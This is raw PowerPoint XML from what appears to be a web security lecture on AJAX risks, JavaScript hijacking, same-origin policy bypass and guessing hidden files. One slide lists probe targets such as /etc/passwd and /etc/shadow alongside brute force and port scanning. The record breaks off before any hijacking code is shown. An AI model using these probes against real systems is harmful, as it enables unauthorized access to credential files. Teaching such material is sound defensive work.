              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01A3DA21-BD44-BC16-48F0-B0691817F77E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9144001" y="2743200"/>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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="363526" name="AutoShape 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6871141-B1BB-B7D4-94F0-A76034E1D7EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="363524" idx="4"/>
            <a:endCxn id="363525" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="5964238" y="-411163"/>
            <a:ext cx="304800" cy="6613525"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 200000"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FFCC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3527" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE595729-EAC6-C254-C7E7-96B595CCB039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="363525" idx="7"/>
            <a:endCxn id="363524" idx="5"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="6126957" y="1092994"/>
            <a:ext cx="142875" cy="6777038"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -553333"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="FFCC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3528" name="Text Box 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3050D9E6-813D-04DA-58E9-F9E4D5A8E1D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5099050" y="1728789"/>
            <a:ext cx="2216150"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0">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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>XmlHTTPRequest</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363529" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{624BA4A2-840B-C89C-DEE3-4A299A9C0E49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4394200" y="5691189"/>
            <a:ext cx="3773488"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0">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Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Response (text, JSON, XML, etc)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="363530" name="Text Box 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9F362ED-5BA0-4F97-AB6B-1A48D1C4B7CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3962400" y="3276601"/>
            <a:ext cx="4686300" cy="9763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0">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000" b="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>There is nothing special about an XHR request other than its asynchronicity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
            <a:endParaRPr lang="en-US" altLang="en-US" b="1">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18"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C1243618-C4DD-71BB-2436-603B210D142A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Potential Issues With AJAX</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364547" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF866AD1-97B5-6EAA-E4B0-FFA01ED9C8DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Responses are sent to the browser, JavaScript code updates the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Be careful what you send back</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Do not leak information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Do NOT trust values that were fed via AJAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Update code is CLIENT side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>The user can see the code being executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Can take advantage of code more easily</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="280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B873835B-5B1B-DACE-47A3-5EF91E9017F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Tips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366595" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54CA27E4-30CE-77D4-D470-3FDF1C908791}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Do NOT overuse AJAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Do processing on the server side if possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
              <a:t>Send raw html back to the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Do not return more information than is necessary to complete the request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Always validate your input!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="280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17D6759B-600C-9CF4-C29D-E4D23E2B1355}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>JavaScript Hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="429059" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{949149D8-FE56-E027-A34E-76A9B8F97B65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Attack vector mostly specific to AJAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>XSS + CSRF = JavaScript Hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>Exploits JavaScript’s flexibility</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>You are free to override </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ANYthing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t> in JavaScript including the base object constructor!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Exploits your trust in the “same-origin policy”</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F1FAC0F6-0D47-EBA6-3539-B8970C38DF7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Same-Origin Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485379" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA784ABF-8A24-003D-37F6-F89C338B99CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>From Wikipedia: It prevents a document or script loaded from one "origin" from getting or setting properties of a document from a different "origin". </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800"/>
              <a:t>Can be bypassed using the &lt;script&gt; tag to retrieve JSON</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9E1BD28-687E-09F8-CED9-5BF10BDA7388}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>Guessing files/directories</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="913411" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46E467CA-71E0-7F72-56E7-D6E0102EFC3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:tabLst>
                <a:tab pos="4402138" algn="l"/>
                <a:tab pos="4967288" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" dirty="0"/>
              <a:t>security through obscurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>: Many reachable files/resources are hidden only by the fact that there is no link to them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:tabLst>
                <a:tab pos="4402138" algn="l"/>
                <a:tab pos="4967288" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:tabLst>
                <a:tab pos="4402138" algn="l"/>
                <a:tab pos="4967288" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Try common file/folder/commands to see what happens:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:tabLst>
                <a:tab pos="4402138" algn="l"/>
                <a:tab pos="4967288" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/shadow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:tabLst>
                <a:tab pos="4402138" algn="l"/>
                <a:tab pos="4967288" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:tabLst>
                <a:tab pos="4402138" algn="l"/>
                <a:tab pos="4967288" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>guess file names based on others</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:tabLst>
                <a:tab pos="4402138" algn="l"/>
                <a:tab pos="4967288" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>page11.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>	--&gt;	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>page12.php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:tabLst>
                <a:tab pos="4402138" algn="l"/>
                <a:tab pos="4967288" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>loginfailure.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>	--&gt;	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>loginsuccess.jsp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:tabLst>
                <a:tab pos="4402138" algn="l"/>
                <a:tab pos="4967288" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>accounts/fred.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>	--&gt;	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>accounts/sue.html</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:tabLst>
                <a:tab pos="4402138" algn="l"/>
                <a:tab pos="4967288" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:tabLst>
                <a:tab pos="4402138" algn="l"/>
                <a:tab pos="4967288" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>brute force / web spiders</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:tabLst>
                <a:tab pos="4402138" algn="l"/>
                <a:tab pos="4967288" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>port scanners</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="913412" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F930E899-99F3-73DE-B7A6-72E12B6EB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5618"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5592661" y="5141913"/>
            <a:ext cx="393065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09187ECF-4B49-EADA-2ECE-3B23A1BB6446}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>How does it work?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="430083" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56B63C28-2DFA-7942-AB67-AFD60E38E2A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:t>The user visits an unfriendly site and executes the following JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
